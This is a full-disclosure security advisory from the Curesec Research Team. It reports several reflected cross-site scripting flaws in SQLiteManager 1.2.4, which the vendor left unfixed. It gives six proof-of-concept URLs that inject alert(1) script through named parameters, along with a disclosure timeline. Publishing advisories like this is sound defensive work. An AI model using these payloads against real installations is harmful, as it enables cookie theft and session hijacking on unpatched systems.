SQLiteManager 1.2.4: Multiple XSS

Security Advisory – Curesec Research Team
1. Introduction

Affected Product: 	SQLiteManager 1.2.4	
Fixed in: 	not fixed
Fixed Version Link: 	n/a	
Vendor Contact: 	sqlitemanager@gmail.com	
Vulnerability Type: 	XSS	
Remote Exploitable: 	Yes	
Reported to vendor: 	09/01/2015	
Disclosed to public: 	10/07/2015	
Release mode: 	Full Disclosure	
CVE: 	n/a	
Credits 	Tim Coen of Curesec GmbH	

2. Vulnerability Description

There are multiple XSS vulnerabilities in SQLiteManager 1.2.4. With
this, it is possible to steal cookies, bypass CSRF protection, or inject
JavaScript keyloggers.
3. Proof of Concept


http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&function="><script>alert(1)</script>
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&table="><script>alert(1)</script>
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&trigger="><script>alert(1)</script>
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&view="><script>alert(1)</script>

http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&action=browseItem&DisplayQuery=</textarea><script>alert(1)</script>

http://localhost/SQLiteManager-1.2.4/main.php?dbsel=1&table=t1&action=insertElement¤tPage=0'"><script>alert(1)</script>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 	Informed Vendor about Issue (no reply)
09/22/2015 	Reminded Vendor of disclosure date (no reply)
10/07/2015 	Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/SQLiteManager-124-Multiple-XSS-67.html